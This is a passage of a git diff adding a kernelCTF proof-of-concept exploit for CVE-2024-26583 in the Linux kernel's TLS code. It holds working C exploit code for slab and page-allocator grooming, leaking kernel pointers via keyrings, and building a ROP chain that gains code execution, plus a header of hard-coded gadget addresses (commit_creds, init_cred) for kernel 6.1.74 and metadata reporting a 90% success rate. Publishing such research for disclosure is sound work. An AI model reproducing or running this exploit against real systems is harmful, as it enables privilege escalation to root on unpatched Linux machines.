+ for (int i = 0; i < mem_size; i+= 8) + { + uint64_t *p = (uint64_t *) (mem+i); + + if (*p == 0x4343434343434343L || *p == 0x4444444444444444L) { + *which_subpage = (*p == 0x4343434343434343L) ? 0 : 1; + + printf("Netlink found at offset %d subpage: %d\n", i, *which_subpage); + return *(p+1); + } + } + + errx(1, "Netlink not found"); + +} + +char *find_key(char *mem, size_t mem_size, int *id_ptr) +{ + char *key = NULL; + uint64_t key_kern; + + for (int i = 0; i < mem_size; i+= 8) + { + uint64_t *p = (uint64_t *) (mem+i); + + if ((*p >> 32) == 0xffffffff) { + printf("Found possible key: %p\n", *p); + + if ((*p & 0xfff) == (KEY_TYPE_KEYRING & 0xfff) && (*p >> 32) == 0xffffffff) { + key = (char *) p - 0x98; + key_kern = *(uint64_t *) (key + 0x38) - 0x38; + *id_ptr = atoi(key+0x92); + g_kernel_text = *p - (KEY_TYPE_KEYRING - 0xffffffff81000000L); + + printf("Key found at: %p/%p id: %d kernel text: %p\n", key_kern, key, *id_ptr, g_kernel_text); + break; + } + } + } + + return key; +} + +void flush_pcp(int xattr_fd, unsigned int flush_cnt) +{ + for (unsigned int i = 0; i < (flush_cnt/8); i++) + { + free_xattr_fd(xattr_fd, 10000 + i); + } +} + +void drain_pcp_order0(int xattr_fd, unsigned int cnt) +{ + unsigned int high, batch, pcp1, pcp2; + + pcp1 = get_pagecount(&high, &batch); + +// kmalloc-256 + for (unsigned int i = 0; i < SLAB_CNT*(cnt+2); i++) + { + alloc_xattr_fd(xattr_fd, 40000 + i, 256, g_mmapped_buf); + + pcp2 = get_pagecount(&high, &batch); + + int delta = pcp2 - pcp1; + + if (delta == -1) { + if (--cnt < 1) + break; + } + + pcp1 = pcp2; + } + + if (cnt > 0) + errx(1, "Unable to drain pcp, remaining: %d\n", cnt); + +} + +unsigned int get_fresh_slabs(int xattr_fd) +{ + unsigned int high, batch, pcp1, pcp2; + + + + unsigned int detected = 0; + +// key_jar + for (unsigned int i = 0; i < KEY_CNT; i++) + { + alloc_key(1000+i, 25, g_mmapped_buf); + } + + pcp1 = get_pagecount(&high, &batch); +// kmalloc-192 + for (unsigned int i = 0; i < 21*4; i++) + { + alloc_xattr_fd(xattr_fd, 30000 + i, 192, g_mmapped_buf); + + pcp2 = get_pagecount(&high, &batch); + + int delta = pcp2 - pcp1; + + if (delta == -1) { + detected = 1; + + break; + } + + pcp1 = pcp2; + } + + if (!detected) + errx(1, "Unable to detect new slab for kmalloc-192\n"); + + return (high-pcp2+100); +} + + +unsigned int prepare_pcp(int xattr_fd) +{ + unsigned int high, batch, pcp1, pcp2; + + for (unsigned int i = 0; i < PCP_MMAP_PAGES / 8; i++) + { + alloc_xattr_fd(xattr_fd, 10000 + i, 32000, g_mmapped_buf); + } + + + pcp1 = get_pagecount(&high, &batch); + + unsigned int detected = 0; + for (unsigned int i = 0; i < SLAB_CNT*2000; i++) + { + alloc_xattr_fd(xattr_fd, 20000 + i, 256, g_mmapped_buf); + + pcp2 = get_pagecount(&high, &batch); + + int delta = pcp2 - pcp1; + + if (delta >= (int) (batch - 2)) { + printf("Detected new pcp batch batch: %d high: %d\n", batch, high); + + for (unsigned int j = 0; j < SLAB_CNT*(batch-2) - 3; j++) + { + alloc_xattr_fd(xattr_fd, 20000 + i + j + 1, 256, g_mmapped_buf); + } + + detected = 1; + + break; + } + + pcp1 = pcp2; + } + + if (!detected) + errx(1, "Unable to detect new pcp batch\n"); + + return (high-pcp2+100); +} + +void stage2(struct simple_xattr *xptr, int xattr_fd) +{ + uint64_t our_xattr_id = * (uint64_t *) (xptr->value + 8); + printf("Stage 2 xattr size: %d name ptr: %p prev: %p next: %p id: %ld\n", xptr->size, xptr->name, xptr->list.prev, xptr->list.next, our_xattr_id); + + xptr->size = 0xffff; + +// Drain ZONE_NORMAL + size_t sz = 1024*1024*1024; + char *m = mmap(NULL, sz, PROT_READ|PROT_WRITE, MAP_ANONYMOUS|MAP_PRIVATE|MAP_POPULATE, -1, 0); + if (m == MAP_FAILED) + err(1, "mmap highmem"); + + memset(m, 'A', sz); + + + prepare_netlinks(); + + unsigned int i; + unsigned int max = our_xattr_id + XATTR_SLAB_CNT*3; + +// increase node->nr_partial + for (i = 0; i < XATTR_SLAB_CNT*6; i++) + { + if ((i % 2) == 0) + free_xattr_fd(g_low_xattr_fds[i], i); + } + + unsigned int flush_cnt = prepare_pcp(xattr_fd); + +// printf("flush_cnt: %d\n", flush_cnt); + + if (flush_cnt > PCP_MMAP_PAGES) + errx(1, "PCP_MMAP_PAGES too low"); + + + for (i = our_xattr_id+1; i < max; i++) + { + free_xattr_fd(g_low_xattr_fds[i], i); + } + + for (; i < (max + XATTR_SLAB_CNT*3); i++) + { + if ((i % 2) == 0) + free_xattr_fd(g_low_xattr_fds[i], i); + } + +// At this point at least 1 slab previously belonging two xattrs was discarded + + + flush_pcp(xattr_fd, flush_cnt); + + memset(g_mmapped_buf, 'C', 0x1000); + memset(g_mmapped_buf+0x1000, 'D', 0x1000); + + for (int i = 0; i < NETLINK_CNT; i++) + { + *(uint64_t *) (g_mmapped_buf + 8) = i; + *(uint64_t *) (g_mmapped_buf + 0x1008) = i; + alloc_netlink(i, 0x1200, g_mmapped_buf); + } + + read_xattr_fd(g_low_xattr_fds[our_xattr_id], our_xattr_id, g_mmapped_buf, 0xffff); + + unsigned int which_subpage; + unsigned int netlink_id = find_netlink(g_mmapped_buf, MMAP_SIZE, &which_subpage); + + get_fresh_slabs(xattr_fd); + + + free_netlink(g_netlinks[netlink_id]); + + if (which_subpage == 0) + drain_pcp_order0(xattr_fd, 1); + + key_serial_t keyrings[KEY2_CNT]; + + for (i = 0; i < KEY2_CNT; i++) + { + keyrings[i] = alloc_keyring(i); + } + + read_xattr_fd(g_low_xattr_fds[our_xattr_id], our_xattr_id, g_mmapped_buf, 0xffff); + + int our_key_id; + char *key_ptr = find_key(g_mmapped_buf, 0xffff, &our_key_id); + + if (!key_ptr) { + errx(1, "Key not found in memory, aborting !"); + } + + + int ret = syscall(SYS_keyctl, KEYCTL_RESTRICT_KEYRING, keyrings[our_key_id], 0, 0); + if (ret < 0) + perror("keyctl restrict"); + + read_xattr_fd(g_low_xattr_fds[our_xattr_id], our_xattr_id, g_mmapped_buf, 0xffff); + + char *key_restrict = *(char **) (key_ptr + 0xd0); + + printf("Key restrict: %p\n", key_restrict); + + xptr->name = key_restrict; + + close(g_low_xattr_fds[our_xattr_id]); + + time_t t1 = time(NULL); + + char *fname; + asprintf(&fname, "/tmp/x_%d", our_xattr_id / XATTR_CHUNK); + ret = unlink(fname); + + if (ret < 0) + perror("unlink"); + + printf("Unlink took %d seconds\n", time(NULL) - t1); + uint64_t buf[8]; + +/* +0xffffffff812bbdb7: mov rax, qword ptr [rcx + 8] +0xffffffff812bbdbb: test rax, rax +0xffffffff812bbdbe: je 0xffffffff812bbdcf +0xffffffff812bbdc0: mov rsi, qword ptr [rcx] +0xffffffff812bbdc3: lea rdi, [rbp - 0x10] +0xffffffff812bbdc7: mov rdx, r14 +0xffffffff812bbdca: call __x86_indirect_thunk_rax +*/ + buf[0] = kaddr(G1); // RIP + + buf[1] = (uint64_t) xptr->list.next + 0x20; // RCX + + alloc_xattr_fd(xattr_fd, 50000, 64, buf); + + g_rop2_len = prepare_rop2((uint64_t *) g_rop2); + if (g_rop2_len > ROP2_CONST_OFFSET) + err(1, "Stage 2 ROP size too big: %d > %d\n", g_rop2_len, ROP2_CONST_OFFSET); + + memset(g_mmapped_buf, 'Z', 0x1000); + prepare_rop(g_mmapped_buf, buf[1]); + + t1 = time(NULL); + for (int i = 0; i < XATTR_CHUNK*3; i++) + { + alloc_xattr_fd(xattr_fd, 60000+i, 2049, g_mmapped_buf); + } + +// Trigger RCE + ret = syscall(SYS_add_key, "user", "pwn", "abcd", 4, keyrings[our_key_id]); + + if (ret < 0) + err(1, "add key"); +} + +int one_attempt(int tfd, int tfd2, unsigned int force_delay) +{ + static unsigned int try = 0; + + char *fname; + asprintf(&fname, "/tmp/y_%d", try++); + int xattr_fd = open(fname, O_RDWR|O_CREAT); + if (xattr_fd < 0) + err(1, "xattr open\n"); + + free(fname); + + int tfd3 = timerfd_create(CLOCK_MONOTONIC, 0); + + int sock_serv = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); + + if (sock_serv < 0) + err(1, "socket"); + + int flag = 1; + setsockopt(sock_serv, SOL_SOCKET, SO_REUSEADDR, &flag, sizeof(flag)); + + struct sockaddr_in addr, peer_addr; + memset(&addr, 0, sizeof(addr)); + + addr.sin_family = AF_INET; + addr.sin_addr.s_addr = inet_addr("127.0.0.1"); + addr.sin_port = htons(7777); + + if (bind(sock_serv, &addr, sizeof(addr)) < 0) + err(1, "connect"); + + listen(sock_serv, 99999); + + + pid_t sender_pid = clone(sender, g_stack2 + STACK_SIZE, CLONE_FS | CLONE_FILES | CLONE_VM | SIGCHLD, NULL); + + if (sender_pid < 0) + err(1, "clone sender"); + + + socklen_t sz = sizeof(peer_addr); + int sock = accept(sock_serv, &peer_addr, &sz); + + if (sock < 0) + err(1, "accept"); + + set_cpu(0); + + + for (int i = 0; i < PARTIAL_CNT; i++) + { + alloc_xattr_fd(xattr_fd, i, 193, g_mmapped_buf); + } + + +// Prepare victim slab +#define VICTIM_IDX 18 +#define VICTIM_IDX2 VICTIM_IDX+SLAB_CNT + for (int i = 0; i < NEIGH_CNT; i++) + { + if (i == VICTIM_IDX) + setup_tls(sock, 1); + else + alloc_xattr_fd(xattr_fd, i+1000, 193, g_mmapped_buf); + } + + for (int i = 0; i < SLAB_CNT; i++) + { + alloc_xattr_fd(xattr_fd, i+2000, 193, g_mmapped_buf); + } + + +// Empty slab around victim object + for (int i = 0; i < NEIGH_CNT; i++) + { + if (i != VICTIM_IDX && i != VICTIM_IDX2) + free_xattr_fd(xattr_fd, i + 1000); + } + + +// Increase per cpu partial count + for (int i = 0; i < SLAB_CNT*7; i++) + { + if ((i % 4) == 0) + free_xattr_fd(xattr_fd, i); + } + + + if (try < MAX_ATTEMPTS) { + if (madvise(g_high_mem, HIGH_MEM_CHUNK, MADV_PAGEOUT) < 0) + err(1, "madvise"); + g_high_mem += HIGH_MEM_CHUNK; + } else if (g_victim_mem) { + munmap(g_victim_mem, PG_ALLOC_SIZE); + } + + + struct itimerspec its = { 0 }; + + int delay = force_delay; + + if (!delay) { + delay = 28 + (rand() % 4); + } + + + struct child_arg carg = { + .tfd = tfd, + .sock = sock, + .try = try, + .delay = delay + }; + + printf("delay: %d attempt: %d\n", carg.delay, carg.try); + + pid_t pid = clone(child_recv, g_stack1 + STACK_SIZE, CLONE_FS | CLONE_FILES | CLONE_VM | SIGCHLD, (void *) &carg); + + eventfd_t event_value; + eventfd_read(g_event1, &event_value); + + ts_add(&its.it_value, 1000); + + timerfd_settime(tfd3, 0, &its, NULL); + + uint64_t v1; + read(tfd3, &v1, sizeof(v1)); + + close(sock); + + usleep(100); + + g_victim_mem = mmap((void *) 0x6600000, PG_ALLOC_SIZE, PROT_READ|PROT_WRITE, MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE|MAP_POPULATE, -1, 0); + if (g_victim_mem == MAP_FAILED) + err(1, "mmap"); + + sleep(0.5); + + set_cpu(1); + + int success = 0; + + char *xattr_ptr; + for (int i = 0; i < PG_ALLOC_SIZE; i += 8) + { + uint64_t *p = (uint64_t *) (g_victim_mem + i); + + if (*p) { + if (*p == 0x4242424242424242L) { + xattr_ptr = (char *) p - 0x20; + success = 1; + break; + } + } + } + + if (success) + stage2((struct simple_xattr *) xattr_ptr, xattr_fd); + + set_cpu(0); + + close(sock_serv); + close(g_sender_sock); + close(tfd3); + close(xattr_fd); + + kill(sender_pid, 9); + kill(pid, 9); + + int status; + + if (waitpid(pid, &status, 0) < 0) + err(1, "waitpid"); + + if (waitpid(sender_pid, &status, 0) < 0) + err(1, "waitpid"); + + sleep(0.5); + + return success; + +} + +int main(int argc, char **argv) +{ + int ret; + struct rlimit rlim; + unsigned int force_delay = 0; + + system("cat /proc/cpuinfo"); + + g_low_xattr_cnt = LOW_XATTR_CNT; + + if (argc > 1 && !strcmp(argv[1], "debug")) { + g_debug = 1; + } else if (argc > 2) { + int num; + if ((num = atoi(argv[2])) > 0) { + g_low_xattr_cnt = num; + } + + if (argc > 3 && (num = atoi(argv[3])) > 0) { + force_delay = num; + } + } + + setbuf(stdout, NULL); + + rlim.rlim_cur = rlim.rlim_max = 4096; + if (setrlimit(RLIMIT_NOFILE, &rlim) < 0) + err(1, "setrlimit()"); + + g_mmapped_buf = mmap(NULL, MMAP_SIZE, PROT_READ|PROT_WRITE, MAP_ANONYMOUS|MAP_PRIVATE|MAP_POPULATE, -1, 0); + if (g_mmapped_buf == MAP_FAILED) { + perror("mmap"); + return 1; + } + + memset(g_mmapped_buf, 0, MMAP_SIZE); + + struct timeval seed_time; + gettimeofday(&seed_time,NULL); + + srand((seed_time.tv_sec * 1000) + (seed_time.tv_usec / 1000)); + + set_cpu(0); + + struct sockaddr_alg sa = { + .salg_family = AF_ALG, + .salg_type = "skcipher", + .salg_name = "cryptd(ctr(aes-generic))" + }; + int c1 = socket(AF_ALG, SOCK_SEQPACKET, 0); + + if (bind(c1, (struct sockaddr *)&sa, sizeof(sa)) < 0) + err(1, "af_alg bind"); + + struct sockaddr_alg sa2 = { + .salg_family = AF_ALG, + .salg_type = "aead", + .salg_name = "ccm_base(cryptd(ctr(aes-generic)),cbcmac(aes-aesni))" + }; + + if (bind(c1, (struct sockaddr *)&sa2, sizeof(sa)) < 0) + err(1, "af_alg bind"); + + + g_stack1 = mmap(NULL, STACK_SIZE, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS | MAP_STACK, -1, 0); + g_stack2 = mmap(NULL, STACK_SIZE, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS | MAP_STACK, -1, 0); + if (g_stack1 == MAP_FAILED || g_stack2 == MAP_FAILED) { + perror("mmap stack"); + exit(1); + + } + +#define ROP2_MMAP_SIZE 0x4000 + g_rop2 = mmap(NULL, ROP2_MMAP_SIZE, PROT_READ|PROT_WRITE, MAP_ANONYMOUS|MAP_PRIVATE|MAP_POPULATE|MAP_LOCKED, -1, 0); + if (g_rop2 == MAP_FAILED) + err(1, "mmap"); + + + int tfd = timerfd_create(CLOCK_MONOTONIC, 0); + int tfd2 = timerfd_create(CLOCK_MONOTONIC, 0); + create_watches(tfd); + + + g_event1 = eventfd(0, 0); + + printf("parent pid: %d\n", getpid()); + + + mlockall(MCL_CURRENT); + + memset(g_mmapped_buf, 'B', 0x1000); + + g_high_mem = mmap((void *) 0x26600000L, HIGH_MEM_SIZE, PROT_READ|PROT_WRITE, MAP_FIXED|MAP_ANONYMOUS|MAP_SHARED|MAP_POPULATE, -1, 0); + if (g_high_mem == MAP_FAILED) + err(1, "mmap highmem"); + + int xfd = -1; + unsigned int xattr_fd_idx = 0; + + char fname[512]; + for (int i = 0; i < g_low_xattr_cnt; i++) + { + if (i == 0 || (i / XATTR_CHUNK) > xattr_fd_idx) { + xattr_fd_idx = i / XATTR_CHUNK; + if ((i % 10000) == 0) + printf("xattrs %d/%d\n", i, g_low_xattr_cnt); + + snprintf(fname, sizeof(fname), "/tmp/x_%d", xattr_fd_idx); + xfd = open(fname, O_RDWR|O_CREAT, 0600); + if (xfd < 0) + err(1, "xattr open\n"); + + } + + *(uint64_t *) (g_mmapped_buf+8) = i; + + g_low_xattr_fds[i] = alloc_xattr_fd(xfd, i, 2049, g_mmapped_buf); + } + + set_cpu(0); + + while(1) + { + if (one_attempt(tfd, tfd2, force_delay)) + break; + + } + + if (!g_pwned) { + printf("Failed to trigger vuln, try again!\n"); + } + +// Can't exit, everything might crash + while (1) + sleep(1000); + + return 0; +} diff --git a/pocs/linux/kernelctf/CVE-2024-26583_lts/exploit/lts-6.1.74/kernelver_6.1.74.h b/pocs/linux/kernelctf/CVE-2024-26583_lts/exploit/lts-6.1.74/kernelver_6.1.74.h new file mode 100644 index 000000000..d7e47a72b --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2024-26583_lts/exploit/lts-6.1.74/kernelver_6.1.74.h @@ -0,0 +1,26 @@ +#define COPY_USER_GENERIC_STRING 0xffffffff821a0900 +#define PUSH_RDI_JMP_QWORD_RSI_0F 0xffffffff81d3b7c5 +#define FIND_TASK_BY_VPID 0xffffffff811b1e80 +#define POP_RCX 0xffffffff8102789d +#define INIT_CRED 0xffffffff838768e0 +#define PUSH_RSI_JMP_QWORD_RSI_0F 0xffffffff81d20d85 +#define PUSH_RSI_JMP_QWORD_RSI_039 0xffffffff8197d8d7 +#define POP_RSI_RDX_RCX 0xffffffff810d0c8a +#define INIT_NSPROXY 0xffffffff838766a0 +#define SWITCH_TASK_NAMESPACES 0xffffffff811b9910 +#define PUSH_RAX_JMP_QWORD_RCX 0xffffffff814c3b03 +#define POP_RDI_RSI_RDX_RCX 0xffffffff810d0c89 +#define POP_RSI_RDI 0xffffffff81a54d11 +#define POP_RDX_RDI 0xffffffff818b470b +#define AUDIT_SYSCALL_EXIT 0xffffffff81269610 +#define RETURN_VIA_SYSRET 0xffffffff824001d1 +#define MEMCPY 0xffffffff8222ed10 +#define COMMIT_CREDS 0xffffffff811bb4b0 +#define POP_RSI 0xffffffff821f39a4 +#define POP_RSP 0xffffffff811b36eb +#define POP_R11_R10_R9_R8_RDI_RSI_RDX_RCX 0xffffffff810d0c81 +#define POP_RDI 0xffffffff8117de8c +#define POP_RDX 0xffffffff81047d02 +#define RW_BUFFER 0xffffffff84700000 +#define G1 0xffffffff812bb977 +#define KEY_TYPE_KEYRING 0xffffffff83a6ad40 diff --git a/pocs/linux/kernelctf/CVE-2024-26583_lts/metadata.json b/pocs/linux/kernelctf/CVE-2024-26583_lts/metadata.json new file mode 100644 index 000000000..4fc15f4ba --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2024-26583_lts/metadata.json @@ -0,0 +1,31 @@ +{ + "$schema": "https://google.github.io/security-research/kernelctf/metadata.schema.v3.json", + "submission_ids": [ + "exp126" + ], + "vulnerability": { + "patch_commit": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=aec7961916f3f9e88766e2688992da6980f11b8d", + "cve": "CVE-2024-26583", + "affected_versions": [ + "4.20 - 5.15.159", + "4.20 - 6.1.78" + ], + "requirements": { + "attack_surface": [ + ], + "capabilities": [ + ], + "kernel_config": [ + "CONFIG_TLS" + ] + } + }, + "exploits": { + "lts-6.1.74": { + "uses": [ + ], + "requires_separate_kaslr_leak": false, + "stability_notes": "90% success rate" + } + } +} diff --git a/pocs/linux/kernelctf/CVE-2024-26583_lts/original.tar.gz b/pocs/linux/kernelctf/CVE-2024-26583_lts/original.tar.gz new file mode 100644 index 000000000..070200d17 Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2024-26583_lts/original.tar.gz differ